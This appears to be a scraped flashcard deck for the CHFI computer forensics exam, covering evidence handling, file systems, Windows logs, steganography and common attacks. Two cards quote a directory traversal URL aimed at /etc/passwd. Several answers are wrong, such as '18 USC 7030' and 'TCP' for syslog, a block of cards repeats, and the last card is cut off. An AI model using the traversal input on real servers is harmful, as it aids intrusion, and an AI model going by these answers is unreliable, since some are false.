(V9) v11.0 (312-49v9) Flashcards

1
Q

File deletion is a way of removing a file from a computer’s file system. What happens when
a file is deleted in windows7?

A

The operating system marks the file’s name in the MFT with a special character that indicates that the file has been deleted

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Networks are vulnerable to an attack which occurs due to overextension of bandwidth,
bottlenecks, network data interception, etc.
Which of the following network attacks refers to a process in which an attacker changes his
or her IP address so that he or she appears to be someone else?

A

IP address spoofing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

The evolution of web services and their increasing use in business offers new attack
vectors in an application framework. Web services are based on XML protocols such as
web Services Definition Language (WSDL) for describing the connection points, Universal
Description, Discovery, and Integration (UDDI) for the description and discovery of Web
services and Simple Object Access Protocol (SOAP) for communication between Web
services that are vulnerable to various web application threats. Which of the following layer
in web services stack is vulnerable to fault code leaks?

A

Discovery Layer

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

The ARP table of a router comes in handy for Investigating network attacks, as the table
contains IP addresses associated with the respective MAC addresses.
The ARP table can be accessed using the __________command in Windows 7.

A

C:\arp -a

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Attackers can manipulate variables that reference files with “dot-dot-slash (./)” sequences
and their variations such as
http://www.juggyDoy.corn/GET/process.php./././././././././etc/passwd.
Identify the attack referred.

A

Directory traversal

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

What is a SCSI (Small Computer System Interface)?

A

A set of ANSI standard electronic interfaces that allow personal computers to communicate with peripheral hardware such as disk drives, tape drives. CD-ROM drives, printers, and scanners

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Billy, a computer forensics expert, has recovered a large number of DBX files during
forensic investigation of a laptop. Which of the following email clients he can use to analyze
the DBX files?

A

Microsoft Outlook Express

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Depending upon the Jurisdictional areas, different laws apply to different incidents. Which
of the following law is related to fraud and related activity in connection with computers?

A

18 USC 7030

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

What is a bit-stream copy?

A

Bit-Stream Copy is a bit-by-bit copy of the original storage medium and exact copy of the original disk

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

T or F? Network forensics can be defined as the sniffing, recording, acquisition and analysis of the
network traffic and event logs in order to investigate a network security incident.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

According to US federal rules, to present a testimony in a court of law, an expert witness
needs to furnish certain information to prove his eligibility. Jason, a qualified computer
forensic expert who has started practicing two years back, was denied an expert testimony
in a computer crime case by the US Court of Appeals for the Fourth Circuit in Richmond,
Virginia. Considering the US federal rules, what could be the most appropriate reason for
the court to reject Jason’s eligibility as an expert witness?

A

Jason was unable to furnish documents showing four years of previous experience in the field

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Syslog is a client/server protocol standard for forwarding log messages across an IP
network. Syslog uses ___________to transfer log messages in a clear text format.

A

TCP

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Which of the following statements is incorrect when preserving digital evidence?

A

Turn on the computer and extract Windows event viewer log files

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

An Internet standard protocol (built on top of TCP/IP) that assures accurate synchronization
to the millisecond of computer clock times in a network of computers. Which of the
following statement is true for NTP Stratum Levels?

A

A stratum-3 server gets its time over a network link, via NTP, from a stratum-2 server, and so on

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

JPEG is a commonly used method of compressing photographic Images. It uses a
compression algorithm to minimize the size of the natural image, without affecting the
quality of the image. The JPEG lossy algorithm divides the image in separate blocks
of____________.

A

8x8 pixels

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Which of the following commands shows you the NetBIOS name table each?

A

nbtstat -n

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

Computer security logs contain information about the events occurring within an
organization’s systems and networks. Which of the following security logs contains Logs of
network and host-based security software?

A

Security software logs

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

What is the smallest allocation unit of a hard disk?

A

Cluster

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

Which of the following is not a part of data acquisition forensics Investigation?

A

Work on the original storage medium not on the duplicated copy

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

In which step of the computer forensics investigation methodology would you run MD5
checksum on the evidence?

A

Acquire the data

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

Damaged portions of a disk on which no read/Write operation can be performed is known
as ______________.

A

Bad sector

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

SIM is a removable component that contains essential information about the subscriber. It
has both volatile and non-volatile memory. The file system of a SIM resides in
_____________ memory.

A

Non-volatile

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

T or F? During first responder procedure you should follow all laws while collecting the evidence,
and contact a computer forensic examiner as soon as possible

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

Which of the following is not a part of disk imaging tool requirements?

A

The tool should not compute a hash value for the complete bit stream copy generated from an image file of the source

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

Why is it Important to consider health and safety factors in the work carried out at all stages
of the forensic process conducted by the forensic analysts?

A

This is to protect the staff and preserve any fingerprints that may need to be recovered at a later date

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

Deposition enables opposing counsel to preview an expert witness’s testimony at trial.
Which of the following deposition is not a standard practice?

A

Only one attorneys is present

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

T or F? When dealing with the powered-off computers at the crime scene, if the computer is
switched off, turn it on

A

False

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

Which table is used to convert huge word lists (i .e. dictionary files and brute-force lists) into
password hashes?

A

Rainbow tables

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

T or F? An expert witness is a witness, who by virtue of education, profession, or experience, is
believed to have special knowledge of his/her subject beyond that of the average person,
sufficient that others legally depend upon his/her opinion.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

T or F? Centralized logging is defined as gathering the computer system logs for a group of
systems in a centralized location. It is used to efficiently monitor computer system logs with
the frequency required to detect security violations and unusual activity.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

T or F? Cyber-crime is defined as any Illegal act involving a gun, ammunition, or its applications.

A

False

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

Files stored in the Recycle Bin in its physical location are renamed as Dxy.ext, where, X
represents the _________.

A

Drive name

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

Ever-changing advancement or mobile devices increases the complexity of mobile device
examinations. Which or the following is an appropriate action for the mobile forensic
investigation?

A

If the device’s display is ON. the screen’s contents should be photographed and, if necessary, recorded manually, capturing the time, service status, battery level, and other displayed icons

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

What is the “Best Evidence Rule”?

A

It states that the court only allows the original evidence of a document, photograph, or recording at the trial rather than a copy

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

T or F? During the seizure of digital evidence, the suspect can be allowed touch the computer
system.

A

False

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

Which of the following standard is based on a legal precedent regarding the admissibility of
scientific examinations or experiments in legal cases?

A

Frye Standard

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

All the Information about the user activity on the network, like details about login and logoff
attempts, is collected in the security log of the computer. When a user’s login is successful,
successful audits generate an entry whereas unsuccessful audits generate an entry for
failed login attempts in the logon event ID table.
In the logon event ID table, which event ID entry (number) represents a successful logging
on to a computer?

A

528

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q

The Recycle Bin is located on the Windows desktop. When you delete an item from the
hard disk, Windows sends that deleted item to the Recycle Bin and the icon changes to full
from empty, but items deleted from removable media, such as a floppy disk or network
drive, are not stored in the Recycle Bin.
What is the size limit for Recycle Bin in Vista and later versions of the Windows?

A

No size limit

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q

In Windows 7 system files, which file reads the Boot.ini file and loads Ntoskrnl.exe.
Bootvid.dll. Hal.dll, and boot-start device drivers?

A

Ntldr

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q

Digital evidence validation involves using a hashing algorithm utility to create a binary or
hexadecimal number that represents the uniqueness of a data set, such as a disk drive or
file.
Which of the following hash algorithms produces a message digest that is 128 bits long?

A

MD5

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q

Which device in a wireless local area network (WLAN) determines the next network point to
which a packet should be forwarded toward its destination?

A

Wireless router

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q

What is the first step that needs to be carried out to crack the password?

A

A word list is created using a dictionary generator program or dictionaries

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q

T or F? Under no circumstances should anyone, with the exception of qualified computer forensics
personnel, make any attempts to restore or recover information from a computer system or
device that holds electronic information.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
44
Q

Email archiving is a systematic approach to save and protect the data contained in emails
so that it can be accessed fast at a later date. There are two main archive types, namely
Local Archive and Server Storage Archive. Which of the following statements is correct
while dealing with local archives?

A

It is difficult to deal with the webmail as there is no offline archive in most cases. So consult your counsel on the case as to the best way to approach and gain access to the required data on servers

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
45
Q

When a system is compromised, attackers often try to disable auditing, in Windows 7;
modifications to the audit policy are recorded as entries of Event ID____________.

A

4902

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
46
Q

Graphics Interchange Format (GIF) is a ___________RGB bitmap Image format for
Images with up to 256 distinct colors per frame.

A

8-bit

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
47
Q

Who is responsible for the following tasks?
? Secure the scene and ensure that it is maintained In a secure state until the
Forensic Team advises
? Make notes about the scene that will eventually be handed over to the Forensic
Team

A

Non-Laboratory Staff

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
48
Q

First responder is a person who arrives first at the crime scene and accesses the victim’s
computer system after the incident. He or She is responsible for protecting, integrating, and
preserving the evidence obtained from the crime scene.
Which of the following is not a role of first responder?

A

Prosecute the suspect in court of law

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
49
Q

T or F? System software password cracking is defined as cracking the operating system and all
other utilities that enable a computer to function

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
50
Q

T or F? A computer forensic report is a report which provides detailed information on the complete
forensics investigation process.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
51
Q

When collecting evidence from the RAM, where do you look for data?

A

Swap file

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
52
Q

Which of the following Steganography techniques allows you to encode information that
ensures creation of cover for secret communication?

A

Cover generation techniques

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
53
Q

Router log files provide detailed Information about the network traffic on the Internet. It
gives information about the attacks to and from the networks. The router stores log files in
the____________.

A

Router cache

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
54
Q

When NTFS Is formatted, the format program assigns the __________ sectors to the boot
sectors and to the bootstrap code

A

First 16

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
55
Q

Smith, as a part his forensic investigation assignment, has seized a mobile device. He was
asked to recover the Subscriber Identity Module (SIM card) data the mobile device. Smith
found that the SIM was protected by a Personal identification Number (PIN) code but he
was also aware that people generally leave the PIN numbers to the defaults or use easily
guessable numbers such as 1234. He unsuccessfully tried three PIN numbers that blocked
the SIM card. What Jason can do in this scenario to reset the PIN and access SIM data?

A

He should ask the network operator for Personal Unlock Number (PUK) to gain access to the SIM

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
56
Q

Injection flaws are web application vulnerabilities that allow untrusted data to be Interpreted
and executed as part of a command or query. Attackers exploit injection flaws by
constructing malicious commands or queries that result in data loss or corruption, lack of
accountability, or denial of access. Which of the following injection flaws involves the
injection of malicious code through a web application?

A

SQL Injection

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
57
Q

How do you define Technical Steganography?

A

Steganography that uses physical or chemical means to hide the existence of a message

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
58
Q

Which of the following statements is not a part of securing and evaluating electronic crime
scene checklist?

A

Blog about the incident on the internet

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
59
Q

BMP (Bitmap) is a standard file format for computers running the Windows operating
system. BMP images can range from black and white (1 bit per pixel) up to 24 bit color
(16.7 million colors). Each bitmap file contains header, the RGBQUAD array, information
header, and image data. Which of the following element specifies the dimensions,
compression type, and color format for the bitmap?

A

The RGBQUAD array

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
60
Q

T or F: Data files from original evidence should be used for forensics analysis

A

False

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
61
Q

Event correlation is a procedure that is assigned with a new meaning for a set of events
that occur in a predefined interval of time.
Which type of correlation will you use if your organization wants to use different OS and
network hardware platforms throughout the network?

A

Cross-platform correlation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
62
Q

Which of the following steganography types hides the secret message in a specifically
designed pattern on the document that is unclear to the average reader?

A

Open code steganography

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
63
Q

Network forensics allows Investigators to inspect network traffic and logs to identify and
locate the attack system
Network forensics can reveal: (Select three answers)

A

A. Source of security incidents’ and network attacks
B. Path of the attack
C. Intrusion techniques used by attackers

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
64
Q

Windows Security Accounts Manager (SAM) is a registry file which stores passwords in a
hashed format.
SAM file in Windows is located at:

A

C:\windows\system32\config\SAM

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
65
Q

T or F: Email archiving is a systematic approach to save and protect the data contained in emails
so that it can tie easily accessed at a later date.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
66
Q

P0P3 (Post Office Protocol 3) is a standard protocol for receiving email that deletes mail on
the server as soon as the user downloads it. When a message arrives, the POP3 server
appends it to the bottom of the recipient’s account file, which can be retrieved by the email
client at any preferred time. Email client connects to the POP3 server at
_______________by default to fetch emails.

A

Port 110

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
67
Q

The status of the network interface cards (NICs) connected to a system gives information
about whether the system is connected to a wireless access point and what IP address is
being used.
Which command displays the network configuration of the NICs on the system?

A

ipconfig /all

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
68
Q

Raw data acquisition format creates ____________of a data set or suspect drive.

A

Simple sequential flat files

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
69
Q

What is a first sector (“sector zero”) of a hard disk?

A

Master boot record

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
70
Q

You have been given the task to investigate web attacks on a Windows-based server.
Which of the following commands will you use to look at which sessions the machine has
opened with other systems?

A

Net use

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
71
Q

The Recycle Bin exists as a metaphor for throwing files away, but it also allows user to
retrieve and restore files. Once the file is moved to the recycle bin, a record is added to the
log file that exists in the Recycle Bin.
Which of the following files contains records that correspond to each deleted file in the
Recycle Bin?

A

INFO2 file

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
72
Q

Which one of the following is not a consideration in a forensic readiness planning checklist?

A

Take permission from all employees of the organization

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
73
Q

LBA (Logical Block Address) addresses data by allotting a ___________to each sector of
the hard disk.

A

Sequential number

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
74
Q

How do you define forensic computing?

A

It is the science of capturing, processing, and investigating data security incidents and making it acceptable to a court of law.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
75
Q

File deletion is a way of removing a file from a computer’s file system. What happens when
a file is deleted in windows7?

A

The operating system marks the file’s name in the MFT with a special character that indicates that the file has been deleted

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
76
Q

Networks are vulnerable to an attack which occurs due to overextension of bandwidth,
bottlenecks, network data interception, etc.
Which of the following network attacks refers to a process in which an attacker changes his
or her IP address so that he or she appears to be someone else?

A

IP address spoofing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
77
Q

The evolution of web services and their increasing use in business offers new attack
vectors in an application framework. Web services are based on XML protocols such as
web Services Definition Language (WSDL) for describing the connection points, Universal
Description, Discovery, and Integration (UDDI) for the description and discovery of Web
services and Simple Object Access Protocol (SOAP) for communication between Web
services that are vulnerable to various web application threats. Which of the following layer
in web services stack is vulnerable to fault code leaks?

A

Discovery Layer

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
78
Q

The ARP table of a router comes in handy for Investigating network attacks, as the table
contains IP addresses associated with the respective MAC addresses.
The ARP table can be accessed using the __________command in Windows 7.

A

C:\arp -a

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
79
Q

Attackers can manipulate variables that reference files with “dot-dot-slash (./)” sequences
and their variations such as
http://www.juggyDoy.corn/GET/process.php./././././././././etc/passwd.
Identify the attack referred.

A

Directory traversal

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
80
Q

What is a SCSI (Small Computer System Interface)?

A

A set of ANSI standard electronic interfaces that allow personal computers to communicate with peripheral hardware such as disk drives, tape drives. CD-ROM drives, printers, and scanners

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
81
Q

Billy, a computer forensics expert, has recovered a large number of DBX files during
forensic investigation of a laptop. Which of the following email clients he can use to analyze
the DBX files?

A

Microsoft Outlook Express

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
82
Q

Depending upon the Jurisdictional areas, different laws apply to different incidents. Which
of the following law is related to fraud and related activity in connection with computers?

A

18 USC 7030

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
83
Q

What is a bit-stream copy?

A

Bit-Stream Copy is a bit-by-bit copy of the original storage medium and exact copy of the original disk

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
84
Q

T or F: Network forensics can be defined as the sniffing, recording, acquisition and analysis of the
network traffic and event logs in order to investigate a network security incident.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
85
Q

According to US federal rules, to present a testimony in a court of law, an expert witness
needs to furnish certain information to prove his eligibility. Jason, a qualified computer
forensic expert who has started practicing two years back, was denied an expert testimony
in a computer crime case by the US Court of Appeals for the Fourth Circuit in Richmond,
Virginia. Considering the US federal rules, what could be the most appropriate reason for
the court to reject Jason’s eligibility as an expert witness?

A

Jason was unable to furnish documents showing four years of previous experience in the field

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
86
Q

Syslog is a client/server protocol standard for forwarding log messages across an IP
network. Syslog uses ___________to transfer log messages in a clear text format.

A

TCP

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
87
Q

Which of the following statements is incorrect when preserving digital evidence?

A

Turn on the computer and extract Windows event viewer log files

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
88
Q

An Internet standard protocol (built on top of TCP/IP) that assures accurate synchronization
to the millisecond of computer clock times in a network of computers. Which of the
following statement is true for NTP Stratum Levels?

A

A stratum-3 server gets its time over a network link, via NTP, from a stratum-2 server, and so on

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
89
Q

Smith, an employee of a reputed forensic Investigation firm, has been hired by a private
organization to investigate a laptop that is suspected to be involved in hacking of
organization DC server. Smith wants to find all the values typed into the Run box in the
Start menu. Which of the following registry key Smith will check to find the above
information?

A

RunMRU key

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
90
Q

An intrusion detection system (IDS) gathers and analyzes information from within a
computer or a network to identify any possible violations of security policy, including
unauthorized access, as well as misuse.
Which of the following intrusion detection systems audit events that occur on a specific
host?

A

Host-based intrusion detection

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
91
Q

Jason, a renowned forensic investigator, is investigating a network attack that resulted in
the compromise of several systems in a reputed multinational’s network. He started
Wireshark to capture the network traffic. Upon investigation, he found that the DNS packets
travelling across the network belonged to a non-company configured IP. Which of the
following attack Jason can infer from his findings?

A

DNS Poisoning

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
92
Q

Which of the following email headers specifies an address for mailer-generated errors, like
“no such user” bounce messages, to go to (instead of the sender’s address)?

A

Errors-To header

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
93
Q

Dumpster Diving refers to:

A

Searching for sensitive information in the user’s trash bins and printer trash bins, and searching the user’s desk for sticky notes

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
94
Q

Which of the following statement is not correct when dealing with a powered-on computer
at the crime scene?

A

If the computer is switched off. power on the computer to take screenshot of the desktop

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
95
Q

What is the First Step required in preparing a computer for forensics investigation?

A

Do not turn the computer off or on, run any programs, or attempt to access data on a computer

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
96
Q

Which of the following file in Novel GroupWise stores information about user accounts?

A

ngwguard.db

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
97
Q

T or F: Physical security recommendations: There should be only one entrance to a forensics lab

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
98
Q

T or F: Mobile phone forensics is the science of recovering digital evidence from a mobile phone
under forensically sound conditions.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
99
Q

Which Is a Linux journaling file system?

A

Ext3

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
100
Q

Which of the following Wi-Fi chalking methods refers to drawing symbols in public places to
advertise open Wi-Fi networks?

A

WarChalking

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
101
Q

Which of the following is not a part of the technical specification of the laboratory-based
imaging system?

A

very low image capture rate

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
102
Q

Which of the following would you consider an aspect of organizational security, especially
focusing on IT security?

A

Application security

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
103
Q

Task list command displays a list of applications and services with their Process ID (PID)
for all tasks running on either a local or a remote computer.
Which of the following task list commands provides information about the listed processes,
including the image name, PID, name, and number of the session for the process?

A

tasklist/V

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
104
Q

Which of the following reports are delivered under oath to a board of
directors/managers/panel of jury?

A

Verbal Formal Report

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
105
Q

Attacker uses vulnerabilities in the authentication or session management functions such
as exposed accounts, session IDs, logout, password management, timeouts, remember
me. secret question, account update etc. to impersonate users, if a user simply closes the
browser without logging out from sites accessed through a public computer, attacker can
use the same browser later and exploit the user’s privileges. Which of the following
vulnerability/exploitation is referred above?

A

Timeout Exploitation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
106
Q

T or F: Digital evidence is not fragile in nature.

A

False

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
107
Q

The need for computer forensics is highlighted by an exponential increase in the number of
cybercrimes and litigations where large organizations were involved. Computer forensics
plays an important role in tracking the cyber criminals. The main role of computer forensics
is to:

A

Extract, process, and interpret the factual evidence so that it proves the attacker’s actions in the court

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
108
Q

In an echo data hiding technique, the secret message is embedded into a __________as
an echo.

A

Cover audio signal

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
109
Q

T or f: When collecting electronic evidence at the crime scene, the collection should proceed from
the most volatile to the least volatile

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
110
Q

Which wireless standard has bandwidth up to 54 Mbps and signals in a regulated
frequency spectrum around 5 GHz?

A

802.11a

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
111
Q

File signature analysis involves collecting information from the __________ of a file to
determine the type and function of the file

A

First 20 bytes

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
112
Q

Which of the following attacks allows attacker to acquire access to the communication
channels between the victim and server to extract the information?

A

Man-in-the-middle (MITM) attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
113
Q

The Electronic Serial Number (ESN) is a unique __________ recorded on a secure chip in
a mobile phone by the manufacturer.

A

32-bit identifier

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
114
Q

Which of the following is not correct when documenting an electronic crime scene?

A

Write down the color of shirt and pant the suspect was wearing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
115
Q

T or F: A steganographic file system is a method to store the files in a way that encrypts and hides
the data without the knowledge of others

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
116
Q

An image is an artifact that reproduces the likeness of some subject. These are produced
by optical devices (i.e. cameras, mirrors, lenses, telescopes, and microscopes).
Which property of the image shows you the number of colors available for each pixel in an
image?

A

Bit Depth

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
117
Q

Which of the following log injection attacks uses white space padding to create unusual log
entries?

A

Word wrap abuse attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
118
Q

T or F: SMTP (Simple Mail Transfer protocol) receives outgoing mail from clients and validates
source and destination addresses, and also sends and receives emails to and from other
SMTP servers.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
119
Q

Buffer Overflow occurs when an application writes more data to a block of memory, or
buffer, than the buffer is allocated to hold. Buffer overflow attacks allow an attacker to
modify the _______________in order to control the process execution, crash the process
and modify internal variables.

A

Target process’s address space

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
120
Q

Which of the following statements does not support the case assessment?

A

Do not document the chain of custody

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
121
Q

What is static executable file analysis?

A

It is a process that consists of collecting information about and from an executable file without actually launching the file under any circumstances

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
122
Q

Which is not a part of environmental conditions of a forensics lab?

A

Open windows facing the public road

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
123
Q

T or F: At the time of evidence transfer, both sender and receiver need to give the information
about date and time of transfer in the chain of custody record.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
124
Q

Operating System logs are most beneficial for Identifying or Investigating suspicious
activities involving a particular host. Which of the following Operating System logs contains
information about operational actions performed by OS components?

A

Event logs

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
125
Q

A mobile operating system is the operating system that operates a mobile device like a
mobile phone, smartphone, PDA, etc. It determines the functions and features available on
mobile devices such as keyboards, applications, email, text messaging, etc. Which of the
following mobile operating systems is free and open source?

A

Android

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
126
Q

Hard disk data addressing is a method of allotting addresses to each ___________of data
on a hard disk

A

Physical block

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
127
Q

WPA2 provides enterprise and Wi-Fi users with stronger data protection and network
access control which of the following encryption algorithm is used DVWPA2?

A

AES-CCMP

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
128
Q

T or F: Steganography is a technique of hiding a secret message within an ordinary message and
extracting it at the destination to maintain the confidentiality of data.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
129
Q

T or F: Digital photography helps in correcting the perspective of the Image which Is used In taking
the measurements of the evidence. Snapshots of the evidence and incident-prone areas
need to be taken to help in the forensic process. Is digital photography accepted as
evidence in the court of law?

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
130
Q

T or F: Consistency in the investigative report is more important than the exact format in the report
to eliminate uncertainty and confusion.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
131
Q

International Mobile Equipment Identifier (IMEI) is a 15-dlgit number that indicates the
manufacturer, model type, and country of approval for GSM devices. The first eight digits of
an IMEI number that provide information about the model and origin of the mobile device is
also known as:

A

Type Allocation Code (TAC)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
132
Q

Windows Security Event Log contains records of login/logout activity or other security-
related events specified by the system’s audit policy. What does event ID 531 in Windows
Security Event Log indicates?

A

A logon attempt was made using a disabled account

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
133
Q

Wireless access control attacks aim to penetrate a network by evading WLAN access
control measures, such as AP MAC filters and Wi-Fi port access controls.
Which of the following wireless access control attacks allows the attacker to set up a rogue
access point outside the corporate perimeter, and then lure the employees of the
organization to connect to it?

A

Client mis-association

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
134
Q

A forensic investigator is a person who handles the complete Investigation process, that is,
the preservation, identification, extraction, and documentation of the evidence. The
investigator has many roles and responsibilities relating to the cybercrime analysis. The
role of the forensic investigator is to:

A

Create an image backup of the original evidence without tampering with potential evidence

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
135
Q

T or F: Web applications provide an Interface between end users and web servers through a set of
web pages that are generated at the server-end or contain script code to be executed
dynamically within the client Web browser.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
136
Q

If a file (readme.txt) on a hard disk has a size of 2600 bytes, how many sectors are
normally allocated to this file?

A

6 Sectors

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
137
Q

MAC filtering is a security access control methodology, where a ___________ is assigned
to each network card to determine access to the network

A

48-bit address

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
138
Q

Which of the following commands shows you the username and IP address used to access
the system via a remote login session and the Type of client from which they are accessing
the system?

A

Net sessions

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
139
Q

Which of the following is the certifying body of forensics labs that investigate criminal cases
by analyzing evidence?

A

The American Society of Crime Laboratory Directors (ASCLD)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
140
Q

T or F: An attack vector is a path or means by which an attacker can gain access to computer or
network resources in order to deliver an attack payload or cause a malicious outcome.

A

True

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
141
Q

What is the first step that needs to be carried out to investigate wireless attacks?

A

Obtain a search warrant

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
142
Q

Tracks numbering on a hard disk begins at 0 from the outer edge and moves towards the
center, typically reaching a value of ___________.

A

1023

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
143
Q

T or F: Data Acquisition is the process of imaging or otherwise obtaining information from a digital
